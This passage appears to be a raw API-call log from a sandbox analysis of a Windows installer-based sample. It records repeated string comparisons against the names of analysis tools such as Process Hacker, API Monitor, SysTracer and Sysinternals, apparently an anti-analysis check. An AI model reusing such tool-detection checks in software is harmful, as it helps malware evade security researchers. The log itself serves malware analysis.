lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.504] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrlenA (lpString="") returned 0 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.504] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrlenA (lpString="") returned 0 [0158.504] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") 
returned="- main thread" [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.504] lstrlenA (lpString="3399936") returned 7 [0158.504] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.504] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.505] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.505] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.505] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.505] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrlenA (lpString="") returned 0 [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: 
lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrlenA (lpString="") returned 0 [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrlenA (lpString="") returned 0 [0158.505] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.505] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.505] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.505] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.505] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.506] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.506] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.506] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.506] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.506] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.506] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.506] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.506] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.506] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.506] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.507] lstrcpynA (in: 
lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.507] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.507] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.507] lstrlenA (lpString="0") returned 1 [0158.507] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.507] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.507] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.507] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.507] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.507] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.508] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.508] lstrlenA (lpString="0") returned 1 [0158.508] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrlenA (lpString="") returned 0 [0158.508] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrlenA (lpString="3399936") returned 7 [0158.508] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrlenA (lpString="") returned 0 [0158.508] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.509] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrlenA (lpString="") returned 0 [0158.509] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrlenA (lpString="") returned 0 [0158.509] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.509] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.510] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.510] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.510] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" 
[0158.510] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.510] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.510] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.510] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.510] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.510] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.510] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.510] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.510] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.510] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.510] lstrcpyA (in: lpString1=0x327e20, 
lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.511] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.511] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.511] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrlenA (lpString="0") returned 1 [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") 
returned="0" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrlenA (lpString="0") returned 1 [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrlenA (lpString="") returned 0 [0158.512] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrlenA (lpString="3399936") returned 7 [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project 
Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrlenA (lpString="") returned 0 [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrlenA (lpString="") returned 0 [0158.513] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrlenA (lpString="") returned 0 [0158.513] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.513] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.513] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.513] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.513] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.513] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.513] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.514] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.514] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.514] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] wsprintfA (in: param_1=0x3401e0, 
param_2="%d" | out: param_1="0") returned 1 [0158.514] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.514] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.514] lstrlenA (lpString="0") returned 1 [0158.514] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.514] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.514] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.514] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.515] lstrlenA (lpString="0") returned 1 [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrlenA (lpString="") returned 0 [0158.515] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | 
